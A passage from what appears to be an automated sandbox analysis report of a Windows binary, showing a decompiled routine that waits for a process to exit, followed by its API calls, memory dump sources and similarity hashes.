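                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                            					} while (_v8 == 0x103);
                                                                                                                                                            					CloseHandle(_t13);
                                                                                                                                                            					_t6 = 1;
                                                                                                                                                            				}
                                                                                                                                                            				/* Returns 1 once the process has exited, 0 if OpenProcess failed. */
                                                                                                                                                            				return _t6;
                                                                                                                                                            			}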


                                                                                                                                                            APIs
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,009C5B93,?,?,?,009C5B93), ref: 009C492A
                                                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 009C493B
                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,009C5B93), ref: 009C4946
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,009C5B93), ref: 009C4956
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CloseCodeExitHandleOpenSleep
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 126888380-0
                                                                                                                                                            • Opcode ID: 7ee5c67a7f0b70ae6dbf50ef9961eecaa67078466365192d936847baa390ac75
                                                                                                                                                            • Instruction ID: 7a42f6893e9c13b48a547a5b46efce2d9ea0c40bfb73c38ddeffdc213ea18cb0
                                                                                                                                                            • Opcode Fuzzy Hash: 7ee5c67a7f0b70ae6dbf50ef9961eecaa67078466365192d936847baa390ac75
                                                                                                                                                            • Instruction Fuzzy Hash: 81E0ED32D66228FBD3219B94DC09FDE7BACEB06762F100150FA04A2080C7708F41AAA9
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%